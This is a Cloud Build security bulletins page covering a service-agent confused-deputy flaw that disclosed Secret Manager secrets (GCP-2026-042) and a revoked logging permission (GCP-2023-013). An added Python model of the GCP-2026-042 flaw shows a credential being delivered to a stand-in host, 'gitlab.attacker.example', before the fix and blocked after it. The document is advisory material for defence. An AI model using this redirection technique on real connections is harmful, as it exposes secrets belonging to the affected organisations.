Security bulletins

The following describes all security bulletins related to Cloud Build.

GCP-2026-042

Published: 2026-06-24

Description

When you create or update a repository connection, Cloud Build authenticates to the third-party Git provider with credentials stored in Secret Manager secrets that the connection references. For GitLab Enterprise (GLE) and Bitbucket Data Center (BBDC) connections, the Cloud Build service agent (P4SA) previously retrieved these referenced secrets on the caller's behalf, so the permission check ran against the P4SA's credentials rather than the calling principal's. A principal allowed to create or update connections but not to access the secret could therefore point the connection's host URI at an endpoint they controlled; the P4SA would fetch the secret and present it to that endpoint, disclosing its value.

To mitigate this vulnerability and adhere to the principle of least privilege, Cloud Build now checks permissions against both the calling principal's credentials (end-user credentials) and the P4SA's when calling repository connection APIs for GLE and BBDC connections. Specifically, the server verifies that both the caller and the P4SA hold the secretmanager.versions.access IAM permission on every referenced Secret Manager secret.

What should I do?

No action is required for existing repository connections. If you encounter permission errors when creating or updating GitLab Enterprise (GLE) or Bitbucket Data Center (BBDC) repository connections, grant the Secret Manager Secret Accessor (roles/secretmanager.secretAccessor) role on the referenced secrets to the user or service account creating or updating the connections.

What vulnerabilities are addressed by this patch?

This vulnerability allowed users with repository connection administrator access to read referenced Secret Manager secrets because the permission checks were only performed against the P4SA's credentials. By requiring permission checks against both the calling principal (using end-user credentials) and the P4SA for GitLab Enterprise (GLE) and Bitbucket Data Center (BBDC) connections, only users authorized with the secretmanager.versions.access IAM permission on the secrets (in addition to the P4SA itself) can use them in repository connections.

Severity: Low
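The following is an added example, not Cloud Build's code, that models the check described in this bulletin: the pre-fix path authorizes only the P4SA, so a connection admin without access to the secret can have it delivered to a host they control, while the post-fix path requires both the caller and the P4SA to hold secretmanager.versions.access. It also includes a small helper that lists which referenced secrets still need the roles/secretmanager.secretAccessor grant described under "What should I do?". The principal names, secret names, secret value and IAM bindings are constructed, and the role-to-permission table is a reduced subset of the real roles.

```python
"""Confused-deputy check modelled on GCP-2026-042 (added example, not Cloud Build code).

Principal names, secret names, the secret payload and the IAM bindings are
constructed; ROLE_PERMISSIONS is a reduced subset of the real IAM roles.
"""
from dataclasses import dataclass, field

SECRET_ACCESS = "secretmanager.versions.access"
SECRET_ACCESSOR_ROLE = "roles/secretmanager.secretAccessor"

# Reduced role -> permission map (the real role grants more than this).
ROLE_PERMISSIONS = {SECRET_ACCESSOR_ROLE: {SECRET_ACCESS}}


@dataclass
class Environment:
    p4sa: str                 # Cloud Build service agent (constructed name)
    secret_values: dict       # secret resource name -> secret payload
    # secret resource name -> {role: {members}}; models per-secret IAM bindings
    secret_policies: dict = field(default_factory=dict)
    # host URI -> credentials that host received (the attacker's view)
    received_by_host: dict = field(default_factory=dict)

    def has_permission(self, member, secret, permission):
        policy = self.secret_policies.get(secret, {})
        return any(permission in ROLE_PERMISSIONS.get(role, set()) and member in members
                   for role, members in policy.items())

    def grant_secret_accessor(self, member, secret):
        roles = self.secret_policies.setdefault(secret, {})
        roles.setdefault(SECRET_ACCESSOR_ROLE, set()).add(member)

    def authenticate_to_host(self, host_uri, secret):
        # The connection handshake presents the referenced credential to host_uri.
        # If host_uri is attacker controlled, whoever runs it now holds the secret.
        self.received_by_host.setdefault(host_uri, []).append(self.secret_values[secret])
        return True


def create_connection_before_fix(env, caller, host_uri, secret):
    """Pre-fix: the P4SA fetches the secret, so only the P4SA is checked.

    The caller is assumed to already hold connection-admin rights; that is the
    bulletin's precondition and is not modelled here.
    """
    if not env.has_permission(env.p4sa, secret, SECRET_ACCESS):
        raise PermissionError(f"{env.p4sa} lacks {SECRET_ACCESS} on {secret}")
    return env.authenticate_to_host(host_uri, secret)


def create_connection_after_fix(env, caller, host_uri, secret):
    """Post-fix: both the calling principal and the P4SA must hold the permission."""
    for principal in (caller, env.p4sa):
        if not env.has_permission(principal, secret, SECRET_ACCESS):
            raise PermissionError(f"{principal} lacks {SECRET_ACCESS} on {secret}")
    return env.authenticate_to_host(host_uri, secret)


def missing_secret_grants(env, caller, secrets):
    """Secrets on which `caller` still needs roles/secretmanager.secretAccessor.

    Mirrors the remediation in "What should I do?": grant the role on each
    referenced secret to the principal creating or updating the connection.
    """
    return [s for s in secrets if not env.has_permission(caller, s, SECRET_ACCESS)]


def demo():
    """Run the attack against both code paths; returns (leaked, blocked, missing)."""
    secret = "projects/example-project/secrets/gle-token"     # constructed
    env = Environment(
        p4sa="service-123@gcp-sa-cloudbuild.iam.gserviceaccount.com",  # constructed
        secret_values={secret: "glpat-CONSTRUCTED-VALUE"},
    )
    env.grant_secret_accessor(env.p4sa, secret)   # the P4SA itself is authorized
    eve = "user:eve@example.com"                  # connection admin, no secret access
    attacker_host = "https://gitlab.attacker.example"

    # Pre-fix: eve never touches the secret, yet her endpoint receives it.
    create_connection_before_fix(env, eve, attacker_host, secret)
    leaked = env.received_by_host[attacker_host]

    # Post-fix: the same call is denied because eve lacks the permission.
    try:
        create_connection_after_fix(env, eve, attacker_host, secret)
        blocked = False
    except PermissionError:
        blocked = True

    return leaked, blocked, missing_secret_grants(env, eve, [secret])


if __name__ == "__main__":
    print(demo())
```

The post-fix check is what the remediation step follows from: a principal that legitimately creates or updates a GLE or BBDC connection now needs roles/secretmanager.secretAccessor on each referenced secret, which missing_secret_grants enumerates, and the P4SA must keep its own grant.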

GCP-2023-013

Published: 2023-06-08

Description

When you enable the Cloud Build API in a project, Cloud Build automatically creates a default service account to execute builds on your behalf. This Cloud Build legacy service account previously held the logging.privateLogEntries.list IAM permission, which let builds list private log entries by default. That permission has now been revoked from the service account to adhere to the principle of least privilege.

What should I do?

No further user action is required. The logging.privateLogEntries.list IAM permission has been revoked from the Cloud Build legacy service account and the fix has been rolled out.

What vulnerabilities are addressed by this patch?

This vulnerability granted builds the permission to list private logs. Since the logging.privateLogEntries.list IAM permission has now been revoked from the Cloud Build legacy service account, builds no longer have access to list private logs by default.

Severity: Low